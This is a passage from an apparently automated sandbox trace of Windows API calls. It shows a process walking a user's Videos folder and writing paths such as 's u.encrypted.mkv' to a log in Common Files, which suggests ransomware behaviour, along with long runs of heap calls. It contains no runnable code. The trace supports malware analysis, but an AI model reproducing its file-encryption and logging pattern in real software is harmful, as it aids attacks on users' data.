(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\s u.mkv")) returned 1 [0043.966] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2afed100, ftCreationTime.dwHighDateTime=0x1d5bf96, ftLastAccessTime.dwLowDateTime=0xfdec7b10, ftLastAccessTime.dwHighDateTime=0x1d5c191, ftLastWriteTime.dwLowDateTime=0x19e8e740, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x17ea7, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="s u.mkv", cAlternateFileName="SU1095~1.MKV")) returned 0 [0043.966] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0043.966] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.966] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0043.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0043.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0043.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0043.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0043.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.966] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.966] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0043.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.967] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0043.967] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0043.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.967] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0043.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0043.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0043.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.967] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0043.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0043.967] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.968] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.968] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0043.968] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.968] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0043.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.968] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0043.968] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x39c9, lpOverlapped=0x0) returned 1 [0043.968] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0043.968] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x39c9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.968] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.encrypted.mkv\r\n", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0043.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x48) returned 0x88e138 [0043.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.encrypted.mkv\r\n", cchWideChar=72, lpMultiByteStr=0x88e138, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.encrypted.mkv\r\n", lpUsedDefaultChar=0x0) returned 72 [0043.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0043.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0043.969] WriteFile (in: hFile=0x140, lpBuffer=0x7f36e0*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f36e0*, lpNumberOfBytesWritten=0x6aee3c*=0x47, lpOverlapped=0x0) returned 1 [0043.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0043.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.969] CloseHandle (hObject=0x140) returned 1 [0043.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0043.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0043.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0043.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0043.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0043.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0043.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0043.973] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0043.973] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0043.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0043.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0043.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0043.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0043.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.975] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0043.975] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.975] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0043.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0043.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.975] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0043.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af408 [0043.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0043.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0043.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0043.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0043.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0043.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a78 [0043.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0043.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0043.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0043.975] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0043.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0043.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0043.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0043.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0043.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0043.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0043.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0043.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0043.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0043.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0043.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0043.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0043.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 